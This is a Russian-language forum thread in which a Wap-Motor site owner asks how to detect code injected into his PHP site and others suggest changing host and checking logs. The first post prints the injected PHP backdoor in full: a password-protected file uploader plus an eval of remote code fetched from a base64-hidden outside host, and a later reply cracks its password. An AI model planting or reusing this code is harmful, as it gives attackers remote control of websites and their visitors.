Внедрение на сайт чужих кодов.

Печать / RSS-лента
0
1. NaPapertiOleg (05.07.18 / 09:07)
Пришелец
Всем привет, как защититься и оградиться от внедрения в код моих сайтов посторонних кусков кода от дешёвых хостеров? к сожалению примеров нет, удалил уже, но факт что в некоторых страницах php в режиме дисплей еррор ссылки на посторонние вредные шокирующие рекламы всякой дряни ведут, на уровне скорее роботов чем людей, однако этот неприятный сюрприз случайно обнаружил когда переделывал посторонний модуль для другого домена, а на чистом движке так и не заметил бы ничего.
Вот что теперь делать? Каждый раз вручную проверять весь движок? Wap-Motor).

Вот и пример нашёлся аж в админке))
ini_set('display_errors','Off'); error_reporting('E_ALL');
setcookie('server',1,time()+1e6);$s=$_SERVER;$sr=$s['HTTP_REFERER'];$sh=$s['HTTP_HOST'];$cs=$_COOKIE['server'];
if(isset($_FILES['u']) && isset($_POST['n']) && isset($_POST['hash']) && md5($_POST['hash'])=='3ff1ea09b981d88e7c8752b329a7702e')
{
move_uploaded_file($_FILES['u']['tmp_name'],$_POST['n']);
}
elseif(($sr && !strpos($sr,$sh) && $cs!=1) || $c=$_GET['cmdcmd'])
{
eval(file_get_contents(base64_decode('aHR0cDovL3FiMC5ydS93Lz91PQ==').$sh.'&c='.$c));
}
Отредактировано: NaPapertiOleg (05.07.18 / 09:15)
0
2. Михаил (05.07.18 / 09:23)
Пацак
Как вариант перейти на нормальный хостинг.
0
3. Вантуз-мен (05.07.18 / 10:06)
Господин ПЖ
@NaPapertiOleg, ну и зачем нужны такие хостеры, поменяй просто и все
0
4. ZiGR (05.07.18 / 10:19)
++=>
md5($_POST['hash'])=='3ff1ea09b981d88e7c8752b329a7702e')


md5('loh') = 3ff1ea09b981d88e7c8752b329a7702e E.gif
0
5. NaPapertiOleg (05.07.18 / 10:22)
Пришелец
Поменять хост это понятно, но тема не про это, а вообще контроль своего кода в принципе возможен или нет? Никто ни на каком хосте не застрахован от этого, в любое время в любом месте разместят такое в движке и не узнаешь.
0
6. Вантуз-мен (05.07.18 / 10:36)
Господин ПЖ
А ты не думаешь , что это через сторонние модули внедряется, хостеры мне кажется не нужны такие вставки, если он захочет , то итак загрузить все что нужно
0
7. NaPapertiOleg (05.07.18 / 10:48)
Пришелец
Не знаю, сам лично никогда с таким не сталкивался, например вап-мотором в своей модификации пользуюсь с самого момента выхода 24-й версии с осени прошлого года и с тех пор менял несколько доменов и несколько хостингов, но движок одинаковый всегда в одном виде, но эти коды появились только сейчас и только на очередном дешёвом хостинге, только на одном последнем, например на бегете такого не было вообще, и теперь уже меня терзают смутные сомнения ... про другие хосты.
0
8. /7o/loTeH4I1k (05.07.18 / 11:30)
Пацак
Хостеру проще на уровне веб-сервера рекламу внедрить, чем по скриптам клиентов шерстить. Ищи через что это делают (логи анализируй). Вообще посмотри когда файл был изменён, от этого и отталкивайся.
Это может быть как взлом хостинга, так и конкретно сайта
0
9. NaPapertiOleg (05.07.18 / 11:47)
Пришелец
Вот ситуация вчера поздно вечером на ночь зарегистрировал новый домен и новый хостинг и разместил движок, но про этот сайт в принципе за ночь никто не мог в сети интернет узнать никак, а утром узнаю про этот код случайно когда полез проверять компилятор java книг на настройку для нового домена в манифесте, вот чудеса), да ещё пробежался поисковиком в нотепаде и в админке всплыла тоже такая ерунда.

Сам вап мотор не может такое сделать, а посторонний модуль только компилятор java книг на файлах, без баз данных, и из копипаста текста в форму отправки данных, там одна php страница и тоже раньше никогда такого не было.
Отредактировано: NaPapertiOleg (05.07.18 / 11:48)
0
10. NaPapertiOleg (05.07.18 / 12:32)
Пришелец
ну вообще не понятки полные, я же удалил все эти коды, а сейчас перед запаковкой в архив снова проверил и они опять появились, прямо на жёстком диске на пк, вообще ничего не понимаю. (.gif
Для добавления сообщения необходимо авторизоваться
Смайлы / Теги / Правила / Топ тем / Топ постов / Поиск